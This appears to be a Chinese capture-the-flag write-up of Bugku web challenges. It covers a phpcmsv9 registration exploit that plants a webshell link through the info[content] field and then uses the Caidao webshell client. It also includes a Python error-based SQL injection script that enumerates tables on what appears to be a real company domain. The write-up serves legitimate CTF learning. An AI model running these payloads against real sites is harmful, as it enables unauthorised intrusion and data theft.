bugku(web进阶 wp)

phpcmsv9

这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了.......

不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的.......

正确的解法应该是找到注册页面

填写了以后在post数据最后加一句&info[content]=

最后的整体数据就是siteid=1&modelid=11&username=rouji&password=rouji123&email=156046546@qq.com&info[content]=&dosubmit=1&protocol=

链接是bugku的小马,然后复制repeater的返回包的链接就可以连菜刀了

实战2-注入

这题翻翻网页可以看到news这个网页有个id值,试下在后面加个单引号发现有报错,尝试注入,一般的闭合很难完全绕过,最后用报错注入

bugku(web进阶 wp)_第1张图片

然后继续试下看表也是能看到,题目说了是最后一个表,后台应该有很多表,拿个脚本跑一跑

import re
import requests
url = "http://www.kabelindo.co.id/readnews.php"
for i in range(0,100):
    payload = "id=1 and (updatexml(@,concat(1,(select table_name from information_schema.tables where table_schema=database() limit %s,1)),1))"%i
    res = requests.get(url=url,params=payload).text
    search = re.search('XPATH syntax error: (.*)',res).group(0)
    print("%s table: %s"%(i,search))

bugku(web进阶 wp)_第2张图片

所以flag就是flag{tbnomax}

你可能感兴趣的:(ctf)